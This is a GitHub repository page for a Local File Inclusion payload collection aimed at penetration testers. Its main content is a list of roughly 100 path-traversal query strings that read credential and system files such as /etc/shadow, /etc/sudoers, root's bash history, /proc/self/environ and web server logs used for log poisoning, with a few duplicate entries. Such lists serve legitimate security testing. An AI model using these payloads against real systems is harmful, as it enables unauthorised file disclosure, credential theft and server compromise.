Skip to content
/ LFI-Payloads Public

LFI Payloads - A comprehensive collection of Local File Inclusion (LFI) payloads for security researchers and penetration testers. This repository includes common, advanced, and bypass techniques to help identify and exploit LFI vulnerabilities effectively.

linktr.ee/yogsec

License

MIT license
4 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

yogsec/LFI-Payloads

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
.github
.github
 
 
Common_LFI_Payloads.txt
Common_LFI_Payloads.txt
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

🚀 LFI Payloads

Welcome to LFI Payloads! This repository is designed to help security researchers and penetration testers identify and exploit Local File Inclusion (LFI) vulnerabilities with effective payloads. 🛡️

WhatsApp Channel Telegram Channel LinkedIn WhatsApp Channel Lichess Email Telegram Channel

📂 What is LFI?

Local File Inclusion (LFI) is a web vulnerability that allows an attacker to include files on a server through the web browser. This can potentially lead to:

  • 🕵️‍♂️ Information Disclosure
  • 🐍 Code Execution
  • 🔥 Server Compromise

📜 Payloads

This repository contains various payloads categorized for easy access:

Basic Payloads
Encoding Techniques
Traversal Techniques
Wrapper Bypass
PHP Filters
Log Poisoning Payloads

🔥 100 Common LFI Payloads

?page=../../../../etc/passwd
?page=../../../../etc/hosts
?page=../../../../windows/win.ini
?page=../../../../boot.ini
?page=../../../../etc/shadow
?page=../../../../etc/group
?page=../../../../proc/self/environ
?page=../../../../var/log/apache2/access.log
?page=../../../../var/log/apache2/error.log
?page=../../../../var/log/httpd/access.log
?page=../../../../var/log/httpd/error.log
?page=../../../../usr/local/apache/logs/access_log
?page=../../../../usr/local/apache/logs/error_log
?page=../../../../var/lib/mysql/mysql.sock
?page=../../../../etc/httpd/httpd.conf
?page=../../../../etc/apache2/apache2.conf
?page=../../../../etc/httpd/conf/httpd.conf
?page=../../../../etc/httpd/conf.d/vhosts.conf
?page=../../../../etc/nginx/nginx.conf
?page=../../../../etc/nginx/sites-enabled/default
?page=../../../../etc/ssl/openssl.cnf
?page=../../../../var/www/html/index.php
?page=../../../../home/user/.bash_history
?page=../../../../root/.bash_history
?page=../../../../etc/issue
?page=../../../../etc/network/interfaces
?page=../../../../etc/resolv.conf
?page=../../../../etc/hostname
?page=../../../../etc/hosts.allow
?page=../../../../etc/hosts.deny
?page=../../../../etc/security/opasswd
?page=../../../../etc/mtab
?page=../../../../etc/fstab
?page=../../../../etc/sudoers
?page=../../../../etc/pam.conf
?page=../../../../etc/profile
?page=../../../../etc/shells
?page=../../../../etc/inittab
?page=../../../../etc/passwd-
?page=../../../../etc/group- 
?page=../../../../etc/shadow- 
?page=../../../../etc/gshadow- 
?page=../../../../var/backups/passwd
?page=../../../../var/backups/group
?page=../../../../var/backups/shadow
?page=../../../../var/backups/gshadow
?page=../../../../dev/mem
?page=../../../../dev/kmem
?page=../../../../dev/port
?page=../../../../proc/mounts
?page=../../../../proc/partitions
?page=../../../../proc/version
?page=../../../../proc/self/status
?page=../../../../proc/self/cmdline
?page=../../../../proc/self/fd
?page=../../../../proc/self/maps
?page=../../../../proc/self/mountinfo
?page=../../../../proc/self/io
?page=../../../../proc/self/limits
?page=../../../../proc/self/cgroup
?page=../../../../proc/self/net/tcp
?page=../../../../proc/self/net/udp
?page=../../../../proc/self/net/raw
?page=../../../../proc/self/net/unix
?page=../../../../proc/self/net/snmp
?page=../../../../proc/self/net/dev
?page=../../../../proc/self/net/ip_conntrack
?page=../../../../proc/self/net/route
?page=../../../../proc/self/net/arp
?page=../../../../proc/self/net/fib_trie
?page=../../../../proc/self/net/netfilter
?page=../../../../var/run/utmp
?page=../../../../var/log/wtmp
?page=../../../../var/log/btmp
?page=../../../../var/log/lastlog
?page=../../../../var/run/utmpx
?page=../../../../var/log/wtmpx
?page=../../../../var/log/btmpx
?page=../../../../var/log/faillog
?page=../../../../var/log/auth.log
?page=../../../../var/log/secure
?page=../../../../var/log/messages
?page=../../../../var/log/syslog
?page=../../../../var/log/kern.log
?page=../../../../var/log/maillog
?page=../../../../var/log/yum.log
?page=../../../../var/log/dpkg.log
?page=../../../../var/log/apt/history.log
?page=../../../../var/log/apt/term.log
?page=../../../../var/log/aptitude
?page=../../../../var/log/boot.log
?page=../../../../var/log/cron
?page=../../../../var/log/daemon.log
?page=../../../../var/log/debug
?page=../../../../var/log/lpr.log
?page=../../../../var/log/user.log
?page=../../../../var/log/xferlog
?page=../../../../var/log/mail.info
?page=../../../../var/log/mail.warn
?page=../../../../var/log/mail.err
?page=../../../../var/log/httpd/access.log
?page=../../../../var/log/httpd/error.log
?page=../../../../var/log/apache2/access.log
?page=../../../../var/log/apache2/error.log

⚙️ Usage

  1. Clone the repository: 
    git clone https://github.com/your-username/LFI-Payloads.git
  2. Navigate to the folder: 
    cd LFI-Payloads
  3. Use the categorized payloads as per your testing requirements.

About

LFI Payloads - A comprehensive collection of Local File Inclusion (LFI) payloads for security researchers and penetration testers. This repository includes common, advanced, and bypass techniques to help identify and exploit LFI vulnerabilities effectively.

linktr.ee/yogsec

Topics

cybersecurity local-file-inclusion bug-hunting-tools lfi-payload cybersecurity-cheatsheet cybersecurity-payloads lfi-payloads lfi-payloads-list local-file-inclusion-payloads bug-bounty-cheatsheet

Resources

Readme

License

MIT license
Activity

Stars

4 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Sponsor this project

Packages

No packages published